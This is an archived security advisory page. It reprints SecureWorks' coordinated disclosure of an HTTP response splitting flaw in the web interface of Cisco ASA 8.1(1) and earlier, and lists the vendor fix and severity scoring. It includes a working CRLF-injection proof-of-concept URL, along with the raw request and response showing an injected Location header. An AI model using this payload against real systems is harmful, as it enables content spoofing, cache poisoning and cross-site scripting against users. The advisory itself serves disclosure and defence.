SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Firewall)  >   Cisco ASA Vendors:   Cisco
Cisco ASA URL Processing Flaw Lets Remote Users Conduct HTTP Response Splitting Attacks
SecurityTracker Alert ID:  1024155
SecurityTracker URL:  http://securitytracker.com/id/1024155
CVE Reference:   CVE-2008-7257   (Links to External Site)
Date:  Jun 26 2010
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 8.1(1) and prior versions
Description:   A vulnerability was reported in Cisco ASA. A remote user can conduct HTTP response splitting attacks.

The HTTP web interface of the ASA does not properly validate user-supplied input. A remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target ASA appliance, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit URL is provided:

http://[target]/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom

Cisco has assigned Cisco Bug ID CSCsr09163 to this vulnerability.

The original advisory is available at:

http://www.secureworks.com/ctu/advisories/SWRX-2010-001

Daniel King of SecureWorks reported this vulnerability.

Impact:   A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

Solution:   The vendor has issued a fix (8.1(2)).

The vendor's advisory is available at:

http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html

Vendor URL:  www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  [SWRX-2010-001] Cisco ASA HTTP Response Splitting Vulnerability

SecureWorks Security Advisory SWRX-2010-001
Cisco ASA HTTP Response Splitting Vulnerability 


Advisory Information
Title: Cisco ASA HTTP Response Splitting Vulnerability 
Advisory ID: SWRX-2010-001
Advisory URL: http://www.secureworks.com/ctu/advisories/SWRX-2010-001
Date published: Thursday, June 24, 2010
CVE: CVE-2008-7257
CVSS v2 Base Score: 5 (Medium) (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Date of last update: Thursday, June 24, 2010
Vendors contacted: Cisco Systems, Inc.
Release mode: Coordinated release
Discovered by: Daniel King, SecureWorks


Summary


Affected Products
Cisco ASA version 8.1(1) and earlier.


Vendor Information, Solutions and Workarounds
Cisco has released a fix to address this security flaw. Upgrade to ASA software version 8.1(2) to remediate this issue.

Release Notes are available at:
http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html

CSCsr09163 webvpn - +webvpn+/index.html http response splitting problem.


Details
When a user connects to the web interface of the ASA via HTTP, they are automatically redirected to the SSL encrypted version. The web server issues a 301 Moved Permanently status code to the connecting client to facilitate this redirection. If the client appends the carriage return (%0d) and line feed (%0a) characters to the URL, the web server will parse these and allow the client to inject arbitrary HTTP response headers. Using this method, it is possible to inject a second Location header to the client. The client web browser will act on only the last Location header it encounters and redirect there.


SecureWorks Risk Scoring



CVSS Severity (version 2.0)
Access Vector: Network exploitable 
Access Complexity: Low
Authentication: Not required to exploit
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
Impact Subscore: 2.9
Exploitability Subscore: 10
CVSS v2 Base Score: 5 (Medium) (AV:N/AC:L/Au:N/C:N/I:P/A:N)


Proof of Concept

URL:
http://x.x.x.x/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom

Request:
GET http://x.x.x.x/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0
Host: x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Response:
HTTP/1.0 301 Moved Permanently
Server: Web Server
Location: https://x.x.x.x/
Location: http://www.google.com
Content-Type: text/html
Content-Length: 125

<HEAD><TITLE>Moved</TITLE></HEAD><BODY><A HREF="https://x.x.x.x/
Location: http://www.google.com">Moved</A></BODY>


Revision History


PGP Keys
This advisory has been signed with the PGP key of the SecureWorks Counter Threat Unit(SM), which is available for download at http://www.secureworks.com/contact/SecureWorksCTU.asc.


About the SecureWorks Counter Threat Unit(SM)


About SecureWorks


Disclaimer
This advisory may not be edited or modified in any way without the express written consent of SecureWorks, Inc. If you wish to reprint this advisory or any portion or element thereof, please contact ctu@secureworks.com to seek permission. Permission is hereby granted to link to this advisory via the SecureWorks website at http://www.secureworks.com/ctu/advisories/SWRX-2010-001 or use in accordance with the fair use doctrine of U.S. copyright laws.

The information within this advisory may change without notice. The most recent version of this advisory may be found on the SecureWorks web site at www.secureworks.com for a limited period of time. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. ANY USE OF THIS INFORMATION IS AT THE USER'S RISK. In no event shall SecureWorks be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC